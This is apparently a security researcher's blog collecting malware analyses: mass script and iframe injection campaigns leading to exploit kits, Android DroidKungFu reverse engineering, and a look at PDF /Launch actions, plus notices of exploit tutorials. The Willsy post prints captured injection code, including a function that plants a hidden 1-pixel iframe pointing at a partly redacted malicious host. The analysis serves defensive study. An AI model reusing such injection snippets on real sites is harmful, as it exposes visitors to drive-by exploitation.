1See Mass Injection 22,000 Sites

Again a large number of sites have been attacked in a mass injection attack that appears to lead to a known exploit pack called BestPack. A brief analysis of the attack is shown below. As with previous attacks, Google shows the list of hit sites. Searching for the domain shows approximately 22,000 sites that the time of analysis.

Google search results

The script tags are injected after the title in a manner identical to the injection attacks shown earlier. The scripts leads to some obfuscated javascript that is a number of function calls that generate iframes leading to another remote site.

Injected script tags

First Layer of Obfuscated Javascript

Deobfuscated Javascript

 

 

 

2nd Stage Javscript

 The next stage javscript attempts to connect to hxxp://www.susxxxxxin.bz.cm/kent/enter.php. The javascript then includes HTML <img> tags like the following <img src="18.png" alt="long string of ^numbers">. The javascript shown above then uses DOM functions to obtain the img element and its src value. This is then assigned to a variable so that it equals "hxxp://www.susxxxxxin.bz.cm/kent/18.png". The javascript then substrings this to get another variable that equals to "18" (i.e. the name of the png image). This is then used to deobfuscate the long string in a for loop. The resultant value is stored in the variable "resalt".

The resalt value is essentially an encoded string that is unescaped and eval'ed to return the exploit page from the BestPack exploit kit containing numerous vulnerabilities that are very similar to the exploit code in the previous post. The value of deobfuscated resalt value is shown below. This is the final stage code that exploits the user.

Android Analysis - Droid Kung Fu

For a number of months now, the threat of mobile malware has been shifting from limited occurences to full scale mass infections across Android Market. One of the most pervasive of these is known as “DroidKrungFu”. This malware has appeared in numerous games packages under various malicious users. The post details one such application and looks at what makes up such an attack.

Analysis of Android malware is similar to that of Java malware. Android runs on the Dalvik VM, which is similar to the JVM. Applications consist of .DEX files that are essentially class files. A complete application consists of an APK file (like a jar) or archive containing dex files and other resources required for an application to run. As with Java there are various to tools to unpack the archives and disassemble the dex files to dalvik bytecode or Java source code making analysis extremely simple. The remainder of the post details the analysis of the sample obtained from Contagio..

Unpacking the Archive
The APK file is essentially an archive that can be unzipped using WinRar or 7zip. The resulting folders are the in the required structure for Android.

The manifest XML file is a binary XML file containing information about the package and configuration information. The file is also reponsible for launching various classes within the package.  As it is in a binary format, it is necessary to decode to a readable format. Using AXMLprinter2.jar we can output it to a readable file. The code is shown below that illustrates the permissions required by the application. A number of unusual permissions are required by the application which should raise suspicion.

Now, it is possible to reverse the DEX files usign a number of techniques. We can use baksmali to revert the code to assembly like bytecode, which is readable but not as intuitive as Java sourcecode. An example of baksmali output is shown:

In this instance, a number of commands are visible such as the chmod and killall commands. This portion of code is reponsible for the setup of folder structures and exploits. Also shown is a URL and some captured phone variables like IMEI. The URL is a known maliciou URL associated with this family of malware. The most effective way to analyse this malware is to convert the files to Java class files and decompile using a Java decompiler such as JDGui. Using the dex2jar application available from http://code.google.com/p/dex2jar/ it is possible to convert the dex files within the apk file to Java class files. Simply run dex2jar.bat with the apk files as an argument and it will convert the file to a JAR file. JDGui may then be used to decompile all of the files to viewer more user friendly source code for review. Some of the resulting code is shown below in the screenshots. These areas of code are responsible for the exploitation and theft of data that KungFu is known for:

Checking permissions and getting root

Getting root using various exploits based on version

Drop file if not installed

Additional trojan functionality

Willsy iFrame Attack on 90,000+ Sites

A large number of sites have been attacked in a mass iFrame injection attack that appears to lead to an exploit pack containing numerous exploits for java, flash and PDF vulnerabilities. The anatomy of the attack is shown below. A quick google search results in over 90,000 sites that have been hit.

Upon visiting site, the iframe has been inject alongside the title of the index page. When hit, the remote site is loaded and results in a 302 response that redirects to another site:

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Jul 2011 21:39:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Location: http://pa<removed>cky.eu/ext/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html

The redirection then leads to page containing a single javascript element.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pafe moved</title>
</head>
<body>
moved
<script type='text/javascript' src='http://ade<removed>rtes.es/images/info/js/js.php'></script>
</body>
</html>

 The PHP page contains a sinlge function reponsible for loading an iframe. This iframe then leads to another site.

function vdeh() {
    if(document.all.length > 3) {
        var dch = document.createElement("iframe");
        dch.id = "dchid";
        dch.src = "http://lab<removed>ce.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34";
        dch.style.width = "1px";
        dch.style.height = "1px";
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdeh()",500);
    }
} setTimeout("vdeh()",500);

This link then leads to another page containing an iframe:

<iframe src="http://lee<removed>t.ru/forum.php?tp=206614280457fe96" width="1" height="1"></iframe>

This final iframe then loads the code responsible for delivering the exploit javascript. This code is heavily obfucsated and consits of a long string of digits in a DIV. The subsequent javascript is reponsible for then deobfuscating the string to javascript, which is execute in an eval statement. The obfuscated code is shown below, along with deobfuscated code. I used firebug to easily remove any unecessary code and reveal the final javascript:

SEH Exploit Tutorial

Just added a SEH overflow tutorial, over at EthicalHacker.net.

"The intent of this exploit tutorial is to educate the reader on the use and understanding of vulnerabilities and exploit development. This will hopefully enable readers to gain a better understanding of the use of exploitation tools and what goes on underneath to more accurately assess the risk of discovered vulnerabilities in a computer environment. It is important for security consultants and ethical hackers to understand how buffer overflows actually work, as having such knowledge will improve penetration testing capabilities. It will also give you the tools to more accurately assess the risk of vulnerabilities and develop effective countermeasures for exploits doing the rounds in the wild."

Stack Overflow Video

Just added a new video covering a stack based remote overflow. The video tutorial is essentially a tutorial covering the exploit process documented by Lupin over at Grey-Corner. Check out the Video section.

Stack Overflow Video

The exploit is in the MiniShare web server application. Enjoy.

Mark

PDF Launch Command without javascript

As a result of discussions with the guys over on EthicalHacker.net, I've decided to briefly write about the latest discovery from Didier Stevens. In this post, I will be looking at the PDF exe launch feature discovered by Didier. Ironically, I used his tools to view the launch objects. In this sample, rather than embed the objects, it seems he is simply using /Launch and /Action features of PDF. The real POC that is unreleased however, will embed objects in a different manner and is more dangerous in my opinion. As a first step, the real PoC also launches cmd.exe. But then it takes 4 extra steps, that ultimately launch an embedded, arbitrary executable.

A similar javascript feature is available in Metaphish, but obviously a feature that doesn’t work if JS is disabled. Post is not too in-depth, just wanted to give you guys a look at the internals.
For the PDF analysis, I used the excellent PDF-Tools from Didier Stevens that can be located here. The main python script that was used was pdf-parser and pdfid seen below:

With PdfID, we can see that there is an OpenAction object which is traditionally used to execute command at PDF runtime. With further analysis using Pdf-parser, we can examine objects within the document.

Using the search feature, we can look for the /Launch action that Didier talks about. In plain sight, the cmd.exe is viewable in object 8. Alternatively, we could have searched for “cmd.exe”. But we don’t know what will be launched in a malicious file...

A full dump of object 8, with the –object flag provides more detailed information and a breakdown of the /Action format.

All in all, a nice little feature identified by Didier and fairly simple to implement. I expect some examples in the wild soon though :P

Cheers,
Mark

SQLMap, Burpsuite and Mutillidae

Just added a new video section, with a view to creating some video tutorials covering web app security, reversing and malware analysis. The first couple of videos are presented on the videos page. Any suggestions for videos will be considered. I have already posed this question to the people over at EthicalHacker.net.

Video section here

Cheers,
Mark